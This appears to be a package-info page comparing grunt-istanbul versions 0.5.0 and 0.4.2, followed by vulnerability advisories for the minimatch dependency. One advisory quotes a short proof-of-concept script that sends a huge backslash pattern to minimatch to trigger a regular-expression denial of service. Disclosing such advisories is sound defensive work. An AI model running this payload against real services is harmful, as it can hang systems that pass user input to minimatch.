Grunt-istanbul is a Grunt plugin designed to provide JavaScript code coverage analysis. Version 0.5.0 and version 0.4.2 share core functionality as JavaScript code coverage tools tightly integrated with the Grunt task runner but show some differences that impact the developer experience. Both versions list dependencies like chalk for terminal styling, istanbul for the core instrumentation and reporting, and nue for some internal functionalities. Common devDependencies include standard Grunt plugins such as grunt-contrib-jshint for code linting, grunt-contrib-nodeunit for unit testing, and grunt-contrib-clean for cleanup tasks. The peerDependencies entry in both versions specifies the necessity of having Grunt version 0.4.5 installed to ensure compatibility.
The critical distinction lies in the introduction of isparta as a devDependency in version 0.5.0. Isparta offers support for ES6/ES2015 code coverage, which suggests that version 0.5.0 introduced or improved capabilities for handling modern JavaScript syntax. Also, in version 0.5.0, there is a change in the version of isparta being ^2.2.0. This enhancement makes version 0.5.0 a more compelling choice for developers working with newer JavaScript features and wanting to generate accurate coverage reports for their ES6+ code. Version 0.5.0 was released on March 26, 2015, shortly after version 0.4.2, released on March 14, 2015.
All the vulnerabilities related to the version 0.5.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.